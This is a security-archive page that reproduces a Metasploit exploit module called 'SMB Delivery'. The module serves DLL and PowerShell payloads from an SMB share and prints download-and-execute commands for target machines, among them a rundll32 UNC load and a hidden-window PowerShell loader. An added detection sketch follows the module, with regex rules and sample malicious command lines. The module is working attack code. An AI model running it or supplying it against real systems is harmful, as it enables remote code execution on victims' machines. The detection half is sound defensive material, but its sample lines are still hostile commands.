SMB Delivery Module

05 Aug 2016 · Reported by Andrew Smith · Type: packetstorm · Source: packetstormsecurity.com

SMB Delivery Module to serve payloads via an SMB server and execute DLLs and PowerShell


Code
```ruby
require 'msf/core'
require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::Powershell

  def initialize(info={})
    super(update_info(info,
      'Name'           => "SMB Delivery",
      'Description'    => %q{
        This module serves payloads via an SMB server and provides commands to retrieve
        and execute the generated payloads. Currently supports DLLs and Powershell.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Andrew Smith',
          'Russel Van Tuyl'
        ],
      'References'     =>
        [
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3074']
        ],
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['DLL', {
            'Platform' => 'win',
            'Arch'     => [ARCH_X86, ARCH_X86_64]
          }],
          ['PSH', {
            'Platform' => 'win',
            'Arch'     => [ARCH_X86, ARCH_X86_64]
          }]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jul 26 2016",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILE_NAME', [ false, 'DLL file name', 'test.dll'])
      ], self.class)

    deregister_options('FILE_CONTENTS')
  end

  def primer
    print_status('Run the following command on the target machine:')
    case target.name
    when 'PSH'
      self.file_contents = cmd_psh_payload( payload.encoded,
                                            payload_instance.arch.first,
                                            remove_comspec: true,
                                            use_single_quotes: true)

      ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
      download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(unc)
      download_and_run = "#{ignore_cert}#{download_string}"
      print_line generate_psh_command_line( noprofile: true,
                                            windowstyle: 'hidden',
                                            command: download_and_run)
    when 'DLL'
      self.file_contents = generate_payload_dll
      print_line("rundll32.exe #{unc},0")
    end
  end
end
```
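For detection, the two commands `primer` prints leave a recognisable shape in process-creation logs: `rundll32.exe` given a DLL on a UNC path, and PowerShell started with a hidden window whose command references a UNC path. The Ruby sketch below is an added example, not part of the module or of Metasploit; the rule names, the `host|command line` log format and the sample lines are constructed, and the abbreviated `-w hidden` spelling in the sample is an assumption about how the `windowstyle` option is rendered.

```ruby
# Added detection sketch: rule names, log format and sample lines are
# constructed for illustration and do not come from the module.

# \\host\share\path ; host may be a name or an IP address
UNC_PATH = /\\\\[\w.\-]+\\[^\s"',]+/

RULES = {
  # rundll32 whose DLL argument lives on a remote share (quoted or not)
  'rundll32_unc_dll' =>
    /\brundll32(?:\.exe)?["']?\s+["']?#{UNC_PATH.source}["']?\s*,/i,
  # PowerShell with a hidden window (-w / -WindowStyle) and a UNC path in its command
  'powershell_hidden_unc' =>
    /\bpowershell(?:\.exe)?\b(?=.*\s-w\w*\s+["']?hidden)(?=.*#{UNC_PATH.source})/i
}.freeze

# Return the names of all rules a single command line matches.
def classify(cmdline)
  RULES.select { |_name, rx| cmdline.match?(rx) }.keys
end

# Parse "host|command line" records and return [host, rule] pairs in input order.
def scan(log)
  log.each_line.flat_map do |line|
    host, cmdline = line.chomp.split('|', 2)
    next [] if cmdline.nil? # skip malformed lines without a separator
    classify(cmdline).map { |rule| [host, rule] }
  end
end

# Constructed process-creation records (192.0.2.0/24 is a documentation range).
SAMPLE_LOG = <<~'LOG'
  ws01|rundll32.exe \\192.0.2.10\share\test.dll,0
  ws02|powershell.exe -nop -w hidden -c "<script that reads '\\192.0.2.10\share\test.dll'>"
  ws03|rundll32.exe shell32.dll,Control_RunDLL
  ws04|powershell.exe -NoProfile -File \\fileserver\scripts\logon.ps1
  ws05|"C:\Windows\System32\rundll32.exe" "\\srv-files\tools\helper.dll",Start
LOG

scan(SAMPLE_LOG).each { |host, rule| puts "#{host}: #{rule}" }
```

The `ws05` hit shows the rundll32 rule also fires on in-house software loaded from a file share, so pair it with an allowlist of known file servers. Blocking outbound SMB (TCP 445) at the network perimeter removes the delivery path to external hosts.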
